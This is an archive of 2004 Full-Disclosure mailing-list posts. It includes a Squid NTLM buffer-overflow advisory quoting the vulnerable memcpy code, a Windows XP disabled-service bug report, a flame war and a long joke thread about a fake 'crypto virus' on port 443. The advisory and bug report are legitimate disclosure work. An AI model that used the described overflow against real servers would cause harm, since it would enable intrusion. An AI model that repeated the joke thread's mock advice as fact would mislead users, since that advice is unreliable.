Re: [Full-Disclosure] Re: Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

[Gadi Evron]

As this is FD, I feel like answering.
Who exactly are you? 
I'm your brother's cousin's uncle's ex-room mate. (I hope I got the 
SpaceBalls quote right).

You come barreling into FD several months ago, long after it was 
created. Pissing in your pants to have found a unmoderated new 
mailing list. You run around on a spree posting every piece 
drivel at every possible opportunity. You then latch onto 
bugtraq riding the coat-tails of other peoples message in order 
to get yours approved. Now I see you have insinuated yourself 
into the Risks Digest 23.41 with perhaps a record 3 messages in 
one go.
I have had few communications with you in the past, but unlike other 
people who can ignore, decline or laugh, you get all "my p?n*s* is 
bigger" and act plain rude. What if I told you I have a dog? Can you 
bark louder?

Besides, FD is open for any discussion or anything else. Like you can 
send your flames, I can send whatever I want. I usually refrain from 
doing it unless I see something on-topic which I feel is important, but 
hey... Who am I to dare tell you that you act like an asshole baby who 
didn't get his milk for lunch?

Somebody spends there time and effort analysing a zero day, you 
then have the fucking nerve to complain about that:
I appreciate any hard work, and I appreciate Jelmer's work which I 
commented on. I also said that most of his post is about his hate 
towards Thor Larholm (which he admits to). That is not professional.
I did ask for clarifications on the 0-day.

But hey, you know what? You know best.


and then you further demonstrate your cockeyed thought process 
by thinking Jelmer has given you a moments thought and has 
also 'dragged personal issues and flames into "the thread"'
He said he did.


"the thread" being his analysis of the zero day that you stuck 
your fat face into in the first place.
Who said I'm fat?
Like I said go start yet 'another' mailing list if you are so 
desparate for attention. You can be the moderator, the only 
poster, the king of the hill, everything you want to be. 
Can I have some chocolate too?
Gadi Evron.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1694 - 33 msgs

[nayana]

First the guy asking for the C# security scanner, and now him ... 

What a waste of our time and resources.



> Message: 29
> From: "Billy B. Bilano" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!
> Date: Tue, 8 Jun 2004 14:00:03 -0500
> 
> Oliver! Hello!
> 
> SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
> ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
> urge ALL of you to do the same before this gets out of control!
> 
> Also, Oliver, I am sure I am telling you something you don't know, but you
> have a bunch of crypto code that is more then likely a virus at the end of
> your message! In fact, you are so infected, that it seems the crypto code is
> longer then the entire message you sent! This is probably how it spreads! I
> saw a couple of other people on this thing already that had this same
> symptom.
> 




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] analysis (more worms wanted :) )

[Byron L. Sonne]

So far I have analyzed the executables (or scripts) of worms, where
my aim was to determine the familiy of an unknown worm.
 

You can view some pictures at http://www.cwi.nl/~wehner/worms, where
you can also find more information about the approach I used.
Note that this is *work in progress*. 

Regardless, it is still very interesting! Granted my knowledge of the 
mathematics behind it is certainly sub-optimal, but I believe I can see 
where you're going. Could you perhaps show some code and the actual 
mechanics of the math behind it... sometimes the practical helps me 
understand the theoretical that much better.

I knew there were reasons I stay subscribed to this list... thanks for 
reminding me ;)

--
For Good, return Good. For Evil, return Justice.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Bug in XP Help and Support, or Don't Be Fooled By Disabled Services

[Trowelfaz]

There seems to be another bug in XP's Help and Support. If you disable the
Help and Support service in the Services control panel and a user either
clicks on the Help and Support icon in the start menu, clicks on a URL that
starts with HCP:// or receives an email with an a link to HCP:// that will
auto-execute the service that was previously set to DISABLED will start and
set itself to automatic. This can only be set by an administrator (hmmm,
what user is an XP Home user logged in as - question for the day...),  but
opens up an avanue for an attacker to possibly exploit this service even if
a user believes it is shit down. What is even funnier is in the KB840374
article, it says that the help and support service cannot be fully patched
if it is disabled. But it can be auto started, can't it? When it is not
supposed to? I always thought that a service that was set to disabled cannot
be set to automatic and started without user intervention. Hmmm, Just maybe
I could get that pesky AV software to go disabled or better yet, the task
scheduler looks pretty nice...

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Job 317]

Thought I might weigh in with a serious comment (although I might regret
it later ;) ).

Any Web hack attack can be sent using the openssl s_client program. You
pipe your attack over an SSL connection to port 443 (or to whatever port
is defined as an SSL port on the victim host).

This has been around for ages. Actually, I am a little surprised in
retrospect that I haven't seen much use of it.

Maybe I took this a little too seriously but this is nothing new.

Job

On  9-Jun-2004 03:00:18 +0200, you wrote:
> We're all feeling a little silly today. This thread has kept me
chuckling all 
> day tho. I don't know what's funnier, the tongue-in-cheek replies or
the 
> serious ones!
> 
> 
> 
> On Tuesday 08 June 2004 16:06, Picciano, Anthony wrote:
> > Did I pick or weird day to join this maillist, or is it always this
silly?
> >
> > -Original Message-
> > From: [EMAIL PROTECTED]
> > [mailto:[EMAIL PROTECTED] Behalf Of Micah
> > McNelly
> > Sent: Tuesday, June 08, 2004 4:32 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [Full-Disclosure] Possible First Crypto Virus
Definitely
> > Discovered!
> >
> >
> > Greatest post of all time.
> >
> > /me claps.
> >
> > /m
> > - Original Message -
> > From: "Goudie, Derek" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, June 08, 2004 1:54 PM
> > Subject: RE: [Full-Disclosure] Possible First Crypto Virus
Definitely
> > Discovered!
> >
> > > Thanks!  I needed that
> > >
> > > -Original Message-
> > > From: Jakob Jünger [mailto:[EMAIL PROTECTED]
> > > Sent: Tuesday, June 08, 2004 1:01 PM
> > > To: [EMAIL PROTECTED]
> > > Subject: Re: [Full-Disclosure] Possible First Crypto Virus
Definitely
> > > Discovered!
> > >
> > > Hi,
> > >
> > > I just can admit to what Billy wrote. The Firewall of my PDA is
getting
> > > hot. It plays "Yellow Submarine" everytime I press the escape-key.
It
> > > has to be something like this crypto-thing. I don't know what
"crypto"
> > > means but it seems to be encrypted with EnglishLanguageProtocol.
> > > Believe me, I have been the administrator of my PDA since I was
three
> > > years old.
> > >
> > > Jakob
> > >
> > > > Whatever ssl is, I don't know but it's using the so-called
"ssl"
> > > > port on the web servers.
> > > >
> > > > But this port 443 is not SSH! Why should it be encrypted? And
what
> > > > is this "ssl" thing? I've been in IT for many years and I am now
IT
> > > > Director here at the bank... I would think that I would know
what
> > > > "ssl" would be. I don't think this worm has anything to do with
> > > > whatever "ssl" is. Does anybody even still use ssl? That's
probably
> > > > why the hackers chose it.
> > > >
> > > >Sorry to say but it is not! I checked my incoming traffic again
this
> > >
> > > morning
> > >
> > > >and the attack on port 443 is still coming in full steam ahead!
I
> > >
> > > don't know
> > >
> > > >what's going on, but I am about to block that port on my
firewall.
> > >
> > > Some
> > >
> > > >nitwit (probably the idiot that was here before I became IT
Director)
> > > >somehow, for some reason, deliberately opened port 443 on the
> > >
> > > firewalls!
> > >
> > > >I am beginning to think that this is the first wave of the new
coming
> > >
> > > global
> > >
> > > >crypto-storm!
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Jerry Heidtke]

Crypto's not new. We had an outbreak in Milwaukee 11 years ago. It's not 
a virus, nor a worm, however. It's an amoeba!

It caused a lot of "traffic" on certain "ports".
http://www.jsonline.com/news/metro/apr03/131542.asp
http://disted.mcw.edu/mpm/epidemic/milwaukee/Cryptosporidium/Chapter1/titlepage.htm
Gregh wrote:
I think the original OP just didn't know how to spell some words correctly.
I believe he actually meant to refer to a "krypto virus" which is one that
affects the Superman factor meaning that those of us who are supposed to
know it all and do it all, 24 hours a day without rest or even a shit, would
start to finally lose that veneer of invulnerability!
(Stranger from a strange I.T, Planet. Jumps firewalls in a single bound!
Faster than a 3.4ghz CPU! Look! Up in the sky! It's a bird! It's a plane! Oh
no, wait - it's chicken bloody little again!)
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[mark]

I found the fix for it.

http://tinyurl.com/37p35


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Picciano, Anthony]

Did I pick or weird day to join this maillist, or is it always this silly?

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Micah
McNelly
Sent: Tuesday, June 08, 2004 4:32 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Greatest post of all time.

/me claps.

/m
- Original Message -
From: "Goudie, Derek" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:54 PM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Thanks!  I needed that
>
> -Original Message-
> From: Jakob Jünger [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 1:01 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Hi,
>
> I just can admit to what Billy wrote. The Firewall of my PDA is getting
> hot. It plays "Yellow Submarine" everytime I press the escape-key. It
> has to be something like this crypto-thing. I don't know what "crypto"
> means but it seems to be encrypted with EnglishLanguageProtocol.
> Believe me, I have been the administrator of my PDA since I was three
> years old.
>
> Jakob
>
> > Whatever ssl is, I don't know but it's using the so-called "ssl"
> > port on the web servers.
>
> > But this port 443 is not SSH! Why should it be encrypted? And what
> > is this "ssl" thing? I've been in IT for many years and I am now IT
> > Director here at the bank... I would think that I would know what
> > "ssl" would be. I don't think this worm has anything to do with
> > whatever "ssl" is. Does anybody even still use ssl? That's probably
> > why the hackers chose it.
>
> >Sorry to say but it is not! I checked my incoming traffic again this
> morning
> >and the attack on port 443 is still coming in full steam ahead! I
> don't know
> >what's going on, but I am about to block that port on my firewall.
> Some
> >nitwit (probably the idiot that was here before I became IT Director)
> >somehow, for some reason, deliberately opened port 443 on the
> firewalls!
>
> >I am beginning to think that this is the first wave of the new coming
> global
> >crypto-storm!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[David Hane]

We're all feeling a little silly today. This thread has kept me chuckling all 
day tho. I don't know what's funnier, the tongue-in-cheek replies or the 
serious ones!



On Tuesday 08 June 2004 16:06, Picciano, Anthony wrote:
> Did I pick or weird day to join this maillist, or is it always this silly?
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Micah
> McNelly
> Sent: Tuesday, June 08, 2004 4:32 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
>
> Greatest post of all time.
>
> /me claps.
>
> /m
> - Original Message -
> From: "Goudie, Derek" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, June 08, 2004 1:54 PM
> Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> > Thanks!  I needed that
> >
> > -Original Message-
> > From: Jakob Jünger [mailto:[EMAIL PROTECTED]
> > Sent: Tuesday, June 08, 2004 1:01 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> > Discovered!
> >
> > Hi,
> >
> > I just can admit to what Billy wrote. The Firewall of my PDA is getting
> > hot. It plays "Yellow Submarine" everytime I press the escape-key. It
> > has to be something like this crypto-thing. I don't know what "crypto"
> > means but it seems to be encrypted with EnglishLanguageProtocol.
> > Believe me, I have been the administrator of my PDA since I was three
> > years old.
> >
> > Jakob
> >
> > > Whatever ssl is, I don't know but it's using the so-called "ssl"
> > > port on the web servers.
> > >
> > > But this port 443 is not SSH! Why should it be encrypted? And what
> > > is this "ssl" thing? I've been in IT for many years and I am now IT
> > > Director here at the bank... I would think that I would know what
> > > "ssl" would be. I don't think this worm has anything to do with
> > > whatever "ssl" is. Does anybody even still use ssl? That's probably
> > > why the hackers chose it.
> > >
> > >Sorry to say but it is not! I checked my incoming traffic again this
> >
> > morning
> >
> > >and the attack on port 443 is still coming in full steam ahead! I
> >
> > don't know
> >
> > >what's going on, but I am about to block that port on my firewall.
> >
> > Some
> >
> > >nitwit (probably the idiot that was here before I became IT Director)
> > >somehow, for some reason, deliberately opened port 443 on the
> >
> > firewalls!
> >
> > >I am beginning to think that this is the first wave of the new coming
> >
> > global
> >
> > >crypto-storm!
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] iDEFENSE Security Advisory 06.08.04: Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability

[idlabs-advisories]

Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow
Vulnerability

iDEFENSE Security Advisory 06.08.04
www.idefense.com/application/poi/display?id=107&type=vulnerabilities
June 8, 2004

I. BACKGROUND

Squid is a fully-featured Web Proxy Cache designed to run on Unix
systems and supports proxying and caching of HTTP, FTP, and other URLs,
as well as SSL support, cache hierarchies, transparent caching, access
control lists and many other features. More information is available at
http://www.squid-cache.org.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Squid Web
Proxy Cache could allow a remote attacker to execute arbitrary code.
Squid Web Proxy Cache supports Basic, Digest and NTLM authentication.
The vulnerability specifically exists within the NTLM authentication
helper routine, ntlm_check_auth(), located in
helpers/ntlm_auth/SMB/libntlmssp.c:

char *ntlm_check_auth(ntlm_authenticate * auth, int auth_length)
{
int rv;
char pass[25] /*, encrypted_pass[40] */;
char *domain = credentials;
...
memcpy(pass, tmp.str, tmp.l);
...

The function contains a buffer overflow vulnerability due to a lack of
bounds checking on the values copied to the 'pass' variable. Both the
'tmp.str' and 'tmp.l' variables used in the memcpy() call contain
user-supplied data.

III. ANALYSIS

A remote attacker can compromise a target system if Squid Proxy is
configured to use the NTLM authentication helper. The attacker can send
an overly long password to overflow the buffer and execute arbitrary
code.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in
Squid-Proxy 2.5.*-STABLE and 3.*-PRE when Squid-Proxy is compiled with
the NTLM helper enabled.

V. WORKAROUNDS

Recompile Squid-Proxy with NTLM handlers disabled.

VI. VENDOR RESPONSE

A patch for this issue is available at:

http://www.squid-cache.org/~wessels/patch/libntlmssp.c.patch

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0541 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/27/04  Exploit acquired by iDEFENSE
05/19/04  iDEFENSE Clients notified
05/20/04  Initial vendor notification
05/20/04  Initial vendor response
06/08/04  Public Disclosure

IX. CREDIT

The discoverer wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Gregh]

I think the original OP just didn't know how to spell some words correctly.
I believe he actually meant to refer to a "krypto virus" which is one that
affects the Superman factor meaning that those of us who are supposed to
know it all and do it all, 24 hours a day without rest or even a shit, would
start to finally lose that veneer of invulnerability!

(Stranger from a strange I.T, Planet. Jumps firewalls in a single bound!
Faster than a 3.4ghz CPU! Look! Up in the sky! It's a bird! It's a plane! Oh
no, wait - it's chicken bloody little again!)


- Original Message - 
From: "Goudie, Derek" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, June 09, 2004 6:54 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Thanks!  I needed that
>
> -Original Message-
> From: Jakob Jünger [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 1:01 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Hi,
>
> I just can admit to what Billy wrote. The Firewall of my PDA is getting
> hot. It plays "Yellow Submarine" everytime I press the escape-key. It
> has to be something like this crypto-thing. I don't know what "crypto"
> means but it seems to be encrypted with EnglishLanguageProtocol.
> Believe me, I have been the administrator of my PDA since I was three
> years old.
>
> Jakob
>
> > Whatever ssl is, I don't know but it's using the so-called "ssl"
> > port on the web servers.
>
> > But this port 443 is not SSH! Why should it be encrypted? And what
> > is this "ssl" thing? I've been in IT for many years and I am now IT
> > Director here at the bank... I would think that I would know what
> > "ssl" would be. I don't think this worm has anything to do with
> > whatever "ssl" is. Does anybody even still use ssl? That's probably
> > why the hackers chose it.
>
> >Sorry to say but it is not! I checked my incoming traffic again this
> morning
> >and the attack on port 443 is still coming in full steam ahead! I
> don't know
> >what's going on, but I am about to block that port on my firewall.
> Some
> >nitwit (probably the idiot that was here before I became IT Director)
> >somehow, for some reason, deliberately opened port 443 on the
> firewalls!
>
> >I am beginning to think that this is the first wave of the new coming
> global
> >crypto-storm!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Micah McNelly]

Greatest post of all time.

/me claps.

/m
- Original Message -
From: "Goudie, Derek" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:54 PM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Thanks!  I needed that
>
> -Original Message-
> From: Jakob Jünger [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, June 08, 2004 1:01 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
> Hi,
>
> I just can admit to what Billy wrote. The Firewall of my PDA is getting
> hot. It plays "Yellow Submarine" everytime I press the escape-key. It
> has to be something like this crypto-thing. I don't know what "crypto"
> means but it seems to be encrypted with EnglishLanguageProtocol.
> Believe me, I have been the administrator of my PDA since I was three
> years old.
>
> Jakob
>
> > Whatever ssl is, I don't know but it's using the so-called "ssl"
> > port on the web servers.
>
> > But this port 443 is not SSH! Why should it be encrypted? And what
> > is this "ssl" thing? I've been in IT for many years and I am now IT
> > Director here at the bank... I would think that I would know what
> > "ssl" would be. I don't think this worm has anything to do with
> > whatever "ssl" is. Does anybody even still use ssl? That's probably
> > why the hackers chose it.
>
> >Sorry to say but it is not! I checked my incoming traffic again this
> morning
> >and the attack on port 443 is still coming in full steam ahead! I
> don't know
> >what's going on, but I am about to block that port on my firewall.
> Some
> >nitwit (probably the idiot that was here before I became IT Director)
> >somehow, for some reason, deliberately opened port 443 on the
> firewalls!
>
> >I am beginning to think that this is the first wave of the new coming
> global
> >crypto-storm!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Jon]

Make sure you block port 80 as well, the dreaded [EMAIL PROTECTED] virus uses this
port. If you see any traffic on there, then chances are you have it.

- Original Message - 
From: "Billy B. Bilano" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 8:00 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Oliver! Hello!
>
> SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
> ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
> urge ALL of you to do the same before this gets out of control!
>
> Also, Oliver, I am sure I am telling you something you don't know, but you
> have a bunch of crypto code that is more then likely a virus at the end of
> your message! In fact, you are so infected, that it seems the crypto code
is
> longer then the entire message you sent! This is probably how it spreads!
I
> saw a couple of other people on this thing already that had this same
> symptom.
>
> Good luck, everybody! I hope we can cleanse our systems of this 443 virus!
>
> 
> Mr. Billy B. Bilano, MSCE, CCNA
> 
> Expert Sysadmin Since 2003!
> 'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
>
>
>
> - Original Message - 
> From: "Oliver Welter" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: "Billy B. Bilano" <[EMAIL PROTECTED]>
> Sent: Tuesday, June 08, 2004 12:43 PM
> Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
> Discovered!
>
>
> > hi Guys,
> >
> > I'm new to the list, so hello first ;)
> > I really dont know if you are just kidding or if I missunderstod your
> > post...
> > Port 443 is the SecureHTTP protocol (https) - so it is correct that it
> > is bound to a webserver process and it is correct that SSL-encryptet
> > traffic goes in and out - so whats the matter ?
> >
> > Oliver
> > -- 
> > Diese Nachricht wurde digital unterschrieben
> > oliwel's public key: http://www.oliwel.de/oliwel.crt
> > Basiszertifikat: http://www.ldv.ei.tum.de/page72
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Disc overed!

[Nico Golde]

hi,
* Ng, Kenneth (US) <[EMAIL PROTECTED]> [2004-06-08 22:49]:
> Question is, are you supposed to have a SSL server on that box?  If so,
> that's what it is.  If not, then you definitely have a problem.  Try
> connecting to that box with the URL you normally use, just use "https"
> instead of "http".  If you get the "normal" page

normally with an certificate before...

> , then someone turned on
> https without realizing it.  If you get something different, then you
> investigate.

regards nico
-- 
Nico Golde - [EMAIL PROTECTED]
[EMAIL PROTECTED] | [EMAIL PROTECTED] | http://www.ngolde.de
GPG: FF46 E565 5CC1 E2E5 3F69  C739 1D87 E549 7364 7CFF
Is there life after /sbin/halt -p?


pgpPQDwf0OPZu.pgp
Description: PGP signature

Re: [Full-Disclosure] FYI Only - Interesting Dot Net configuration item

[H D Moore]

Hi Dan,

That is hilarious, check out the two ASP.Net presentations below :)

http://www.digitaldefense.net/labs/presentations/Breaking.ASP.NET/
http://metasploit.com/confs/index.html

-HD

On Tuesday 08 June 2004 12:53, DAN MORRILL wrote:
> Trace dot axd is a tracing function that can be controlled in the
> web.config file. 

> Web.config file holds configuration data for dot net for the web
> server. 

> all source files (.CS or .VB) can provide information about how the web
> application is set up,

> Just thought I would pass this along as I have not seen anything like
> this posted on the network at all. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Second crypto virus discovered in the wild!!!!!

[VB]

Hi, all,
I just discovered a new crypto virus. i just got in to my job as IT director
for a major defense contractor. i was smoking some crypto in the parking lot
before coming in and all of a sudden i started coughing, completely out of
the blue. i've never coughed before when smoking the crypto so i know it
must be a virus. i dont think it was a worm, cuz that would have probably
given me diareah or something, right?
please confirm this, i've never seen anything like it, the attacks are still
coming.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Billy B. Bilano]

Oliver! Hello!

SSL is the same port as HTTPS ? OMFG then we have a bigger problem than I
ever imagined!! HOLY SMOKES! I am going to block port 443 right now and I
urge ALL of you to do the same before this gets out of control!

Also, Oliver, I am sure I am telling you something you don't know, but you
have a bunch of crypto code that is more then likely a virus at the end of
your message! In fact, you are so infected, that it seems the crypto code is
longer then the entire message you sent! This is probably how it spreads! I
saw a couple of other people on this thing already that had this same
symptom.

Good luck, everybody! I hope we can cleanse our systems of this 443 virus!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS



- Original Message - 
From: "Oliver Welter" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 12:43 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> hi Guys,
>
> I'm new to the list, so hello first ;)
> I really dont know if you are just kidding or if I missunderstod your
> post...
> Port 443 is the SecureHTTP protocol (https) - so it is correct that it
> is bound to a webserver process and it is correct that SSL-encryptet
> traffic goes in and out - so whats the matter ?
>
> Oliver
> -- 
> Diese Nachricht wurde digital unterschrieben
> oliwel's public key: http://www.oliwel.de/oliwel.crt
> Basiszertifikat: http://www.ldv.ei.tum.de/page72
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[Valdis . Kletnieks]

On Tue, 08 Jun 2004 10:53:29 CDT, "Billy B. Bilano" <[EMAIL PROTECTED]>  said:
> Bill Bilano here, reporting in from the front-lines! I've got some
> disturbing news that I've got to get some answers about while I share. I
> think we're about to come under full hacker attack at any second! And to
> those people that said us folks talking about crypto viruses were being
> chicken littles... let me tell you, the sky just fell! And it is HEAVY!

All: Please read this link before replying further:

http://www.catb.org/~esr/jargon/html/Y/YHBT.html


pgpWbZz85GqYO.pgp
Description: PGP signature

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Disc overed!

[Goudie, Derek]

Thanks!  I needed that

-Original Message-
From: Jakob Jünger [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 08, 2004 1:01 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

Hi,

I just can admit to what Billy wrote. The Firewall of my PDA is getting
hot. It plays "Yellow Submarine" everytime I press the escape-key. It
has to be something like this crypto-thing. I don't know what "crypto"
means but it seems to be encrypted with EnglishLanguageProtocol.
Believe me, I have been the administrator of my PDA since I was three
years old.

Jakob

> Whatever ssl is, I don't know but it's using the so-called "ssl"
> port on the web servers.

> But this port 443 is not SSH! Why should it be encrypted? And what
> is this "ssl" thing? I've been in IT for many years and I am now IT
> Director here at the bank... I would think that I would know what
> "ssl" would be. I don't think this worm has anything to do with
> whatever "ssl" is. Does anybody even still use ssl? That's probably
> why the hackers chose it.

>Sorry to say but it is not! I checked my incoming traffic again this
morning
>and the attack on port 443 is still coming in full steam ahead! I
don't know
>what's going on, but I am about to block that port on my firewall.
Some
>nitwit (probably the idiot that was here before I became IT Director)
>somehow, for some reason, deliberately opened port 443 on the
firewalls!

>I am beginning to think that this is the first wave of the new coming
global
>crypto-storm!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

[joe]

The only thing funnier than this post are the responses to it.

Good show.

Cheers Billy, thanks for the laugh.



   joe
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Billy B. Bilano
Sent: Tuesday, June 08, 2004 11:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
